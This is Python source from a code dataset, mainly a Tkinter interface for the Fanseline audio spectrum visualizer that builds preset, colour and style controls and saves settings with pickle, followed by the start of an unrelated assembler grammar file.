tk_fq_high, color_dic, list_color, tk_scalar, \\\n tk_width, tk_height, tk_fps, tk_br_video, tk_br_audio, tk_audio_normal, tk_smooth, \\\n tk_bg_path, tk_bright, tk_blur_bg, tk_use_glow, tk_relsize, tk_bg_mode, label_mp4, \\\n style_dic, tk_saturation, tk_text_brt\n\n def fileCheck(dicv, tk_value):\n try:\n path = vdic[dicv]\n if path is not None and os.path.exists(path):\n tk_value.set(path)\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def strCheck(dicv, tk_value, trunc=False):\n try:\n strv = vdic[dicv]\n if strv is not None:\n if not trunc:\n tk_value.set(strv)\n else:\n tk_value.set(\"\".join(strv.split(\".\")[:-1]))\n else:\n tk_value.set(\"\")\n except:\n pass\n\n def numCheck(dicv, tk_value):\n try:\n num = vdic[dicv]\n if num is not None:\n tk_value.set(num)\n else:\n tk_value.set(0)\n except:\n pass\n\n fileCheck(\"image_path\", tk_image_path)\n fileCheck(\"sound_path\", tk_sound_path)\n fileCheck(\"bg_path\", tk_bg_path)\n fileCheck(\"logo_path\", tk_logo_path)\n fileCheck(\"output_path\", tk_output_path)\n strCheck(\"filename\", tk_filename, True)\n strCheck(\"text\", tk_text)\n fileCheck(\"font\", tk_font)\n numCheck(\"bins\", tk_bins)\n numCheck(\"lower\", tk_fq_low)\n numCheck(\"upper\", tk_fq_high)\n numCheck(\"scalar\", tk_scalar)\n numCheck(\"width\", tk_width)\n numCheck(\"height\", tk_height)\n numCheck(\"fps\", tk_fps)\n numCheck(\"br_Mbps\", tk_br_video)\n numCheck(\"br_kbps\", tk_br_audio)\n numCheck(\"normal\", tk_audio_normal)\n numCheck(\"bright\", tk_bright)\n numCheck(\"saturation\", tk_saturation)\n numCheck(\"blur_bg\", tk_blur_bg)\n numCheck(\"use_glow\", tk_use_glow)\n numCheck(\"smooth\", tk_smooth)\n numCheck(\"relsize\", tk_relsize)\n numCheck(\"text_brt\", tk_text_brt)\n numCheck(\"linewidth\", tk_linewidth)\n numCheck(\"rotate\", tk_rotate)\n\n try:\n if vdic[\"color\"] is not None:\n color_prev = None\n for cname, ccode in color_dic.items():\n if ccode == vdic[\"color\"]:\n color_prev = cname\n break\n if color_prev is not None:\n tk_color.set(color_prev)\n except:\n pass\n\n try:\n if vdic[\"blur_bg\"] is not None and vdic[\"bg_mode\"] is not None:\n if vdic[\"bg_mode\"] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n for bname, values in bg_mode_dic.items():\n if values == [vdic[\"blur_bg\"], vdic[\"bg_mode\"]]:\n tk_bg_mode.set(bname)\n except:\n pass\n\n try:\n if vdic[\"style\"] is not None:\n for sname, scode in style_dic.items():\n if scode == vdic[\"style\"]:\n tk_style.set(sname)\n break\n except:\n pass\n\n entry_img.xview(\"end\")\n 
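# NOTE (editor-added sketch of a defensive variant of the saveConfig/loadConfig
# pair above, not from the original file): merging the pickled dict over a set
# of defaults means a key missing from an old config (e.g. after an update adds
# new options) cannot raise later. The path mirrors './Source/config.pickle'.
import pickle

def load_config_or(defaults, path="./Source/config.pickle"):
    try:
        with open(path, "rb") as handle:
            loaded = pickle.load(handle)
    except (OSError, pickle.UnpicklingError, EOFError):
        return dict(defaults)           # no/corrupt config: fall back cleanly
    return {**defaults, **loaded}       # stored values override the defaults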
entry_logo.xview(\"end\")\n entry_bg.xview(\"end\")\n entry_fname.xview(\"end\")\n entry_audio.xview(\"end\")\n entry_output.xview(\"end\")\n entry_font.xview(\"end\")\n\n\ndef saveLanguage():\n global lang, lang_code\n with open('./Source/language.pickle', 'wb') as handle:\n pickle.dump(lang_code, handle, protocol=pickle.HIGHEST_PROTOCOL)\n\n\ndef loadLanguage():\n global lang, lang_code\n lang_code = \"en\"\n try:\n with open('./Source/language.pickle', 'rb') as handle:\n lang_code = pickle.load(handle)\n except:\n print(\"No language config\")\n\n if lang_code == \"cn_s\":\n lang = lang_cn_s\n else:\n lang = lang_en\n\n\ndef resetGUI(*args):\n global lang_code, exit_flag, root, list_lang\n # lang_code = lc\n if list_lang.get() == \"简体中文\":\n lang_code = \"cn_s\"\n else:\n lang_code = \"en\"\n saveConfig()\n saveLanguage()\n exit_flag = False\n root.destroy()\n\n\ndef setFileType(*args):\n global label_mp4, bg_mode_dic, tk_bg_mode\n try:\n if bg_mode_dic[tk_bg_mode.get()][1] >= 0:\n label_mp4[\"text\"] = \".mp4\"\n else:\n label_mp4[\"text\"] = \".mov\"\n except:\n pass\n\n\ndef fastPreview(*args):\n global frame2, old_vdic\n if frame2 and frame2.winfo_viewable():\n vdic = getAllValues()\n if vdic != old_vdic:\n showPreview()\n\n\ndef shortCut(event):\n if event.keysym == \"F5\":\n startBlending()\n if event.keysym == \"F4\":\n showPreview()\n\n\ndef bindPreview(tk_obj):\n tk_obj.trace(\"w\", lambda name, index, mode=tk_obj: fastPreview())\n\n\nif __name__ == '__main__':\n exit_flag = False\n GUI_WIDTH = 950\n GUI_HEIGHT = 700\n while not exit_flag:\n exit_flag = True\n\n root = tk.Tk()\n loadLanguage()\n\n old_vdic = None\n tk_image_path = tk.StringVar(value=\"./Source/fallback.png\")\n tk_sound_path = tk.StringVar()\n tk_logo_path = tk.StringVar(value=\"./Source/Logo.png\")\n tk_bg_path = tk.StringVar(value=\"\")\n tk_output_path = tk.StringVar()\n tk_filename = tk.StringVar(value=\"output\")\n\n tk_text = tk.StringVar()\n tk_font = tk.StringVar(value=\"./Source/font.otf\")\n tk_relsize = tk.DoubleVar(value=1.0)\n bindPreview(tk_relsize)\n tk_text_brt = tk.DoubleVar(value=1.0)\n bindPreview(tk_text_brt)\n\n tk_bins = tk.IntVar(value=80)\n bindPreview(tk_bins)\n\n tk_fq_low = tk.IntVar()\n tk_fq_high = tk.IntVar()\n tk_scalar = tk.DoubleVar()\n tk_color = tk.StringVar()\n bindPreview(tk_color)\n tk_bright = tk.DoubleVar(value=0.8)\n bindPreview(tk_bright)\n tk_saturation = tk.DoubleVar(value=0.8)\n bindPreview(tk_saturation)\n tk_smooth = tk.IntVar()\n tk_linewidth = tk.DoubleVar(value=1.0)\n bindPreview(tk_linewidth)\n tk_style = tk.StringVar()\n bindPreview(tk_style)\n\n tk_bg_mode = tk.StringVar()\n bindPreview(tk_bg_mode)\n tk_blur_bg = tk.BooleanVar(value=True)\n bindPreview(tk_blur_bg)\n tk_use_glow = tk.BooleanVar(value=False)\n bindPreview(tk_use_glow)\n tk_rotate = tk.DoubleVar(value=0)\n\n tk_width = tk.IntVar()\n tk_height = tk.IntVar()\n tk_fps = tk.DoubleVar()\n tk_br_video = tk.DoubleVar()\n tk_br_audio = tk.IntVar()\n tk_audio_normal = tk.BooleanVar()\n\n tk_preseta = tk.StringVar()\n tk_presetv = tk.StringVar()\n\n tk_lang = tk.StringVar()\n\n isRunning = False\n\n fb = FanBlender()\n\n root.title(lang[\"Fanseline Audio Visualizer\"] + \" -V.\" + __version__)\n root.bind('', shortCut)\n canvas = tk.Canvas(root, width=GUI_WIDTH, height=GUI_HEIGHT)\n canvas.pack()\n frame1 = tk.Frame(master=root)\n frame1.place(relx=0, rely=0, relwidth=1, relheight=1, anchor='nw')\n\n root_view = tk.Toplevel(root)\n root_view.title(lang[\"Preview\"])\n root_view.withdraw()\n canvas = 
tk.Canvas(root_view, width=GUI_WIDTH // 2, height=GUI_HEIGHT // 2)\n canvas.pack()\n frame2 = ImageViewer(root_view)\n frame2.setGUI(GUI_WIDTH * 2 / 3, GUI_HEIGHT)\n frame2.setLanguage(lang)\n\n rely, devy = 0.01, 0.06\n relh = 0.04\n\n label_lang = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Language/语言:\"), anchor=\"e\")\n label_lang.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_lang = ttk.Combobox(master=frame1, textvariable=tk_lang, state=\"readonly\")\n list_lang[\"values\"] = (\"English\", \"简体中文\")\n if lang_code == \"cn_s\":\n list_lang.current(1)\n else:\n list_lang.current(0)\n list_lang.place(relwidth=0.1, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n list_lang.bind(\"<>\", resetGUI)\n\n label_preseta = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio Preset:\"]), anchor=\"e\")\n label_preseta.place(relwidth=0.1, relheight=relh, relx=0.25, rely=rely, anchor='nw')\n list_preseta = ttk.Combobox(master=frame1, textvariable=tk_preseta, state=\"readonly\")\n audio_dic = {\n lang[\"Music-HQ\"] + \" (320k)\": [320, 20, 2500, False, 1.0, 2],\n lang[\"Music-MQ\"] + \" (128k)\": [128, 20, 2500, False, 1.0, 2],\n lang[\"Music-LQ\"] + \" (48k)\": [48, 20, 2500, False, 1.0, 2],\n lang[\"Voice-HQ\"] + \" (320k)\": [320, 20, 2500, True, 1.0, 5],\n lang[\"Voice-MQ\"] + \" (128k)\": [128, 40, 2200, True, 1.0, 5],\n lang[\"Voice-LQ\"] + \" (48k)\": [48, 80, 2000, True, 1.0, 5],\n }\n list_preseta[\"values\"] = dict2tuple(audio_dic)\n list_preseta.current(0)\n list_preseta.bind(\"<>\", presetAudio)\n presetAudio()\n list_preseta.set(lang[\"-Please Select-\"])\n list_preseta.place(relwidth=0.14, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n\n label_presetv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Preset:\"]), anchor=\"e\")\n label_presetv.place(relwidth=0.1, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n list_presetv = ttk.Combobox(master=frame1, textvariable=tk_presetv, state=\"readonly\")\n video_dic = {\n lang[\"Square\"] + \" (1080x1080)\": [1080, 1080, 30, getDefaultBR(1080, 1080, 30, 5)],\n lang[\"Square\"] + \" (1024x1024)\": [1024, 1024, 30, getDefaultBR(1024, 1024, 30, 5)],\n lang[\"Square\"] + \" (720x720)\": [720, 720, 30, getDefaultBR(720, 720, 30, 4)],\n lang[\"Square\"] + \" (512x512)\": [512, 512, 30, getDefaultBR(512, 512, 30, 4)],\n lang[\"Square\"] + \" (480x480)\": [480, 480, 30, getDefaultBR(480, 480, 30, 4)],\n lang[\"Landscape\"] + \" (1920x1080)\": [1920, 1080, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Landscape\"] + \" (1280x720)\": [1280, 720, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Landscape\"] + \" (854x480)\": [854, 480, 30, getDefaultBR(854, 480, 30, 4)],\n lang[\"Portrait\"] + \" (1080x1920)\": [1080, 1920, 30, getDefaultBR(1920, 1080, 30, 5)],\n lang[\"Portrait\"] + \" (720x1280)\": [720, 1280, 30, getDefaultBR(1280, 720, 30, 4)],\n lang[\"Portrait\"] + \" (480x854)\": [480, 854, 30, getDefaultBR(854, 480, 30, 4)],\n \"2k (2560x1440)\": [2560, 1440, 30, getDefaultBR(2560, 1440, 30, 5)],\n }\n list_presetv[\"values\"] = dict2tuple(video_dic)\n list_presetv.current(4)\n list_presetv.bind(\"<>\", presetVideo)\n presetVideo()\n list_presetv.set(lang[\"-Please Select-\"])\n list_presetv.place(relwidth=0.19, relheight=relh, relx=0.6, rely=rely, anchor='nw')\n\n btn_prev = tk.Button(master=frame1, text=lang[\"Preview\"], command=showPreview)\n btn_prev.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n 
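# NOTE (editor-added sketch of the dict-backed Combobox pattern used for
# audio_dic/video_dic above): display names are the dict keys, values hold the
# real settings. The bind sequences in this dump appear HTML-stripped
# (bind("<>", ...)); the standard ttk virtual event "<<ComboboxSelected>>" is
# assumed here.
import tkinter as tk
from tkinter import ttk

root = tk.Tk()
presets = {"Square (720x720)": (720, 720), "Landscape (1280x720)": (1280, 720)}
var = tk.StringVar()
box = ttk.Combobox(root, textvariable=var, state="readonly",
                   values=tuple(presets))   # keys become the display items
box.bind("<<ComboboxSelected>>", lambda e: print(presets[var.get()]))
box.pack()
root.mainloop()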
entry_audio = tk.Entry(master=frame1, textvariable=tk_sound_path)\n entry_audio.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_audio = tk.Button(master=frame1, text=lang[\"Audio (REQUIRED)\"], command=selectAudio)\n btn_audio.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_img = tk.Entry(master=frame1, textvariable=tk_image_path)\n entry_img.place(relwidth=0.74, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_img = tk.Button(master=frame1, text=lang[\"Foreground Image\"], command=selectImage)\n btn_img.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n entry_bg = tk.Entry(master=frame1, textvariable=tk_bg_path)\n entry_bg.place(relwidth=0.28, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n btn_bg = tk.Button(master=frame1, text=lang[\"Background Image\"], command=selectBG)\n btn_bg.place(relwidth=0.15, relheight=relh, relx=0.34, rely=rely, anchor='nw')\n\n entry_logo = tk.Entry(master=frame1, textvariable=tk_logo_path)\n entry_logo.place(relwidth=0.29, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n btn_logo = tk.Button(master=frame1, text=lang[\"Logo File\"], command=selectLogo)\n btn_logo.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_textplz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Your Text:\"]), anchor=\"e\")\n label_textplz.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_text = tk.Entry(master=frame1, textvariable=tk_text)\n entry_text.place(relwidth=0.18, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_text.bind(\"\", fastPreview)\n entry_text.bind('', fastPreview)\n tk_text.set(\"Hello World!\")\n\n label_text_brt = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Text Brt.:\"]), anchor=\"e\")\n label_text_brt.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_text_brt = ttk.Combobox(master=frame1, textvariable=tk_text_brt)\n entry_text_brt[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_text_brt.current(0)\n entry_text_brt.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_font = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Font Size:\"]), anchor=\"e\")\n label_font.place(relwidth=0.08, relheight=relh, relx=0.51, rely=rely, anchor='nw')\n\n entry_relsize = ttk.Combobox(master=frame1, textvariable=tk_relsize)\n entry_relsize[\"values\"] = (3.0, 2.8, 2.5, 2.2, 2.0, 1.8, 1.5, 1.2, 1.0, 0.8, 0.5)\n entry_relsize.current(8)\n entry_relsize.place(relwidth=0.05, relheight=relh, relx=0.59, rely=rely, anchor='nw')\n\n entry_font = tk.Entry(master=frame1, textvariable=tk_font)\n entry_font.place(relwidth=0.14, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n btn_font = tk.Button(master=frame1, text=lang[\"Font File\"], command=selectFont)\n btn_font.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_size = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video Size:\"]), anchor=\"e\")\n label_size.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_width = tk.Entry(master=frame1, textvariable=tk_width)\n entry_width.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n entry_width.bind(\"\", fastPreview)\n entry_width.bind('', fastPreview)\n\n label_mul = tk.Label(master=frame1, 
textvariable=tk.StringVar(value=\"x\"))\n label_mul.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n\n entry_height = tk.Entry(master=frame1, textvariable=tk_height)\n entry_height.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n entry_height.bind(\"\", fastPreview)\n entry_height.bind('', fastPreview)\n\n label_fps = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"FPS:\"]), anchor=\"e\")\n label_fps.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_fps = ttk.Combobox(master=frame1, textvariable=tk_fps)\n entry_fps[\"values\"] = (60.0, 50.0, 30.0, 25.0, 20.0, 15.0)\n entry_fps.current(2)\n entry_fps.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_brv = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Video BR (Mbps):\"]), anchor=\"e\")\n label_brv.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_brv = tk.Entry(master=frame1, textvariable=tk_br_video)\n entry_brv.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n btn_autob = tk.Button(master=frame1, text=lang[\"Auto Bit Rate\"], command=autoBitrate)\n btn_autob.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_bra = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Audio BR:\"]), anchor=\"e\")\n label_bra.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_bra = ttk.Combobox(master=frame1, textvariable=tk_br_audio)\n list_bra[\"values\"] = (320, 256, 192, 128, 96, 64, 48)\n list_bra.current(0)\n list_bra.place(relwidth=0.08, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_kbps = tk.Label(master=frame1, textvariable=tk.StringVar(value=\"Kbps\"), anchor=\"w\")\n label_kbps.place(relwidth=0.05, relheight=relh, relx=0.23, rely=rely, anchor='nw')\n\n check_normal = tk.Checkbutton(master=frame1, text=lang[\"Normalize Volume\"],\n variable=tk_audio_normal, onvalue=True, offvalue=False, anchor=\"e\")\n check_normal.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n\n label_bg_mode = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"BG Mode:\"]), anchor=\"e\")\n label_bg_mode.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_bg_mode = ttk.Combobox(master=frame1, textvariable=tk_bg_mode, state=\"readonly\")\n bg_mode_dic = {\n lang[\"Blurred BG Image\"]: [True, 0],\n lang[\"Normal BG Image\"]: [False, 0],\n lang[\"Blurred BG Only\"]: [True, 2],\n lang[\"Normal BG Only\"]: [False, 2],\n lang[\"Transparent\"]: [False, -1],\n lang[\"Spectrum Only\"]: [False, -2],\n }\n\n list_bg_mode[\"values\"] = dict2tuple(bg_mode_dic)\n list_bg_mode.current(0)\n list_bg_mode.bind(\"<>\", setFileType)\n list_bg_mode.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_range = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Analyze Freq:\"]), anchor=\"e\")\n label_range.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_low = tk.Entry(master=frame1, textvariable=tk_fq_low)\n entry_low.place(relwidth=0.05, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n label_to = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"to\"]))\n label_to.place(relwidth=0.03, relheight=relh, relx=0.2, rely=rely, anchor='nw')\n entry_up = tk.Entry(master=frame1, textvariable=tk_fq_high)\n entry_up.place(relwidth=0.05, relheight=relh, relx=0.23, 
rely=rely, anchor='nw')\n label_hz = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Hz\"]), anchor=\"w\")\n label_hz.place(relwidth=0.03, relheight=relh, relx=0.28, rely=rely, anchor='nw')\n\n label_bins = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Num:\"]), anchor=\"e\")\n label_bins.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_bins = ttk.Combobox(master=frame1, textvariable=tk_bins)\n entry_bins[\"values\"] = (6, 12, 18, 24, 36, 48, 60, 72, 84, 96, 108, 120)\n entry_bins.current(5)\n entry_bins.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_scalar = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Scalar:\"]), anchor=\"e\")\n label_scalar.place(relwidth=0.12, relheight=relh, relx=0.53, rely=rely, anchor='nw')\n entry_scalar = ttk.Combobox(master=frame1, textvariable=tk_scalar)\n entry_scalar[\"values\"] = (0.05, 0.1, 0.2, 0.5, 0.7, 1.0, 1.5, 2.0, 2.5, 3.0, 3.5, 4.0, 4.5, 5.0)\n entry_scalar.current(5)\n entry_scalar.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_color = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Hue:\"]), anchor=\"e\")\n label_color.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n list_color = ttk.Combobox(master=frame1, textvariable=tk_color, state=\"readonly\")\n\n color_dic = {\n lang[\"Rainbow 4x\"]: \"color4x\",\n lang[\"Rainbow 2x\"]: \"color2x\",\n lang[\"Rainbow 1x\"]: \"color1x\",\n lang[\"White\"]: \"white\",\n lang[\"Black\"]: \"black\",\n lang[\"Gray\"]: \"gray\",\n lang[\"Red\"]: \"red\",\n lang[\"Green\"]: \"green\",\n lang[\"Blue\"]: \"blue\",\n lang[\"Yellow\"]: \"yellow\",\n lang[\"Magenta\"]: \"magenta\",\n lang[\"Purple\"]: \"purple\",\n lang[\"Cyan\"]: \"cyan\",\n lang[\"Light Green\"]: \"lightgreen\",\n lang[\"Green - Blue\"]: \"green-blue\",\n lang[\"Magenta - Purple\"]: \"magenta-purple\",\n lang[\"Red - Yellow\"]: \"red-yellow\",\n lang[\"Yellow - Green\"]: \"yellow-green\",\n lang[\"Blue - Purple\"]: \"blue-purple\",\n }\n\n list_color[\"values\"] = dict2tuple(color_dic)\n list_color.current(0)\n list_color.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n\n label_style = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Style:\"]), anchor=\"e\")\n label_style.place(relwidth=0.1, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n list_style = ttk.Combobox(master=frame1, textvariable=tk_style)\n\n style_dic = {\n lang[\"Solid Line\"]: 0,\n lang[\"Dot Line\"]: 1,\n lang[\"Single Dot\"]: 2,\n lang[\"Double Dot\"]: 7,\n lang[\"Concentric\"]: 8,\n lang[\"Line Graph\"]: 17,\n lang[\"Classic 1\"]: 9,\n lang[\"Classic 2\"]: 10,\n lang[\"Classic 3\"]: 15,\n lang[\"Classic 4\"]: 16,\n lang[\"Classic Dot 1\"]: 11,\n lang[\"Classic Dot 2\"]: 12,\n lang[\"Classic Dot 3\"]: 13,\n lang[\"Classic Dot 4\"]: 14,\n lang[\"Stem Plot 1\"]: 3,\n lang[\"Stem Plot 2\"]: 4,\n lang[\"Stem Plot 3\"]: 5,\n lang[\"Stem Plot 4\"]: 6,\n lang[\"No Spectrum\"]: -1,\n }\n list_style[\"values\"] = dict2tuple(style_dic)\n list_style[\"state\"] = \"readonly\"\n list_style.current(0)\n list_style.place(relwidth=0.13, relheight=relh, relx=0.15, rely=rely, anchor='nw')\n\n label_linewidth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Line Width:\"]), anchor=\"e\")\n label_linewidth.place(relwidth=0.1, relheight=relh, relx=0.35, rely=rely, anchor='nw')\n entry_linewidth = 
ttk.Combobox(master=frame1, textvariable=tk_linewidth)\n entry_linewidth[\"values\"] = (\n 15.0, 12.0, 10.0, 8.0, 6.0, 5.0, 4.0, 3.0, 2.0, 1.5, 1.2, 1.0, 0.8, 0.6, 0.5, 0.4, 0.3)\n entry_linewidth.current(11)\n entry_linewidth.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n label_smooth = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spectrum Stabilize:\"]), anchor=\"e\")\n label_smooth.place(relwidth=0.15, relheight=relh, relx=0.50, rely=rely, anchor='nw')\n list_smooth = ttk.Combobox(master=frame1, textvariable=tk_smooth)\n list_smooth[\"values\"] = (0, 1, 2, 3, 5, 6, 7, 8, 9, 10)\n list_smooth.current(0)\n list_smooth.place(relwidth=0.05, relheight=relh, relx=0.65, rely=rely, anchor='nw')\n\n label_saturation = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. Sat.:\"]), anchor=\"e\")\n label_saturation.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_saturation = ttk.Combobox(master=frame1, textvariable=tk_saturation)\n entry_saturation[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_saturation.current(4)\n entry_saturation.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n label_rotate = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spin FG(rpm):\"]), anchor=\"e\")\n label_rotate.place(relwidth=0.15, relheight=relh, relx=0.3, rely=rely, anchor='nw')\n entry_rotate = ttk.Combobox(master=frame1, textvariable=tk_rotate)\n entry_rotate[\"values\"] = (6.0, 5.0, 4.0, 3.0, 2.0, 1.0, 0.0, - 1.0, -2.0, -3.0, -4.0, -5.0, -6.0)\n entry_rotate.current(6)\n entry_rotate.place(relwidth=0.05, relheight=relh, relx=0.45, rely=rely, anchor='nw')\n\n check_use_glow = tk.Checkbutton(master=frame1, text=lang[\"Glow Effect (SLOW)\"],\n variable=tk_use_glow, onvalue=True, offvalue=False, anchor=\"e\")\n check_use_glow.place(relwidth=0.15, relheight=relh, relx=0.55, rely=rely, anchor='nw')\n\n label_bright = tk.Label(master=frame1, textvariable=tk.StringVar(value=lang[\"Spec. 
Brt.:\"]), anchor=\"e\")\n label_bright.place(relwidth=0.1, relheight=relh, relx=0.7, rely=rely, anchor='nw')\n entry_bright = ttk.Combobox(master=frame1, textvariable=tk_bright)\n entry_bright[\"values\"] = (1.0, 0.9, 0.8, 0.7, 0.6, 0.5, 0.4, 0.3, 0.2, 0.1, 0.0)\n entry_bright.current(4)\n entry_bright.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n rely += devy\n scr = scrolledtext.ScrolledText(master=frame1, width=20, height=10)\n scr.place(relwidth=0.9, relheight=relh * 6.5, relx=0.05, rely=rely, anchor='nw')\n\n rely += relh * 6.8\n\n entry_output = tk.Entry(master=frame1, textvariable=tk_output_path)\n entry_output.place(relwidth=0.44, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n entry_fname = tk.Entry(master=frame1, textvariable=tk_filename)\n entry_fname.place(relwidth=0.25, relheight=relh, relx=0.5, rely=rely, anchor='nw')\n label_mp4 = tk.Label(master=frame1, text=\".mp4\", anchor=\"w\")\n label_mp4.place(relwidth=0.05, relheight=relh, relx=0.75, rely=rely, anchor='nw')\n btn_output = tk.Button(master=frame1, text=lang[\"Output (REQUIRED)\"], command=selectOutput)\n btn_output.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n rely += devy\n\n progress = ttk.Progressbar(master=frame1, orient=tk.HORIZONTAL, mode='determinate', value=0)\n progress.place(relwidth=0.7, relheight=relh, relx=0.05, rely=rely, anchor='nw')\n\n btn_blend = tk.Button(master=frame1, text=lang[\"Blend & Export\"], command=startBlending)\n btn_blend.place(relwidth=0.15, relheight=relh, relx=0.8, rely=rely, anchor='nw')\n\n loadConfig()\n clearLog()\n\n try:\n ctypes.windll.shcore.SetProcessDpiAwareness(1)\n ScaleFactor = ctypes.windll.shcore.GetScaleFactorForDevice(0)\n root.tk.call('tk', 'scaling', ScaleFactor / 75) # DPI settings\n root_view.tk.call('tk', 'scaling', ScaleFactor / 75)\n root_view.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n root.iconphoto(False, tk.PhotoImage(file='./Source/icon-small.png'))\n except:\n pass\n\n\n def disable_event():\n if fb.isRunning:\n tkinter.messagebox.showinfo(lang[\"Notice\"], lang[\"Please stop blending before quit!\"])\n else:\n root.destroy()\n\n\n def close_view():\n root_view.withdraw()\n\n\n root.protocol(\"WM_DELETE_WINDOW\", disable_event)\n root_view.protocol(\"WM_DELETE_WINDOW\", close_view)\n frame1.tkraise()\n showPreview()\n root.mainloop()\n","sub_path":"SourceCode/FanBlender_GUI.py","file_name":"FanBlender_GUI.py","file_ext":"py","file_size_in_byte":42455,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"52"} +{"seq_id":"106017447","text":"# -*- coding: utf-8 -*-\n\n\"\"\"\nAuthor : Ntwali Bashige\nCopyright : Copyright 2019 - Ntwali Bashige\nLicense : MIT\nVersion : 0.0.1\nMaintainer : Ntwali Bashige\nEmail : ntwali.bashige@gmail.com\n\"\"\"\n\nfrom asm.parsing.parselets.expressions import LiteralParselet, AssignmentParselet, StaticExpressionParselet, DynamicExpressionParselet\nfrom asm.parsing.parselets.declarations import CircuitDeclarationParselet\nfrom common.token_type import TokenType\n\n\nclass Grammar(object):\n \"\"\"\n\n \"\"\"\n parselets = {\n TokenType.CIRCUIT : CircuitDeclarationParselet(),\n TokenType.IDENTIFIER : StaticExpressionParselet(),\n TokenType.PERCENT : DynamicExpressionParselet(),\n TokenType.EQUAL : AssignmentParselet(),\n TokenType.CBINARY : LiteralParselet(),\n 
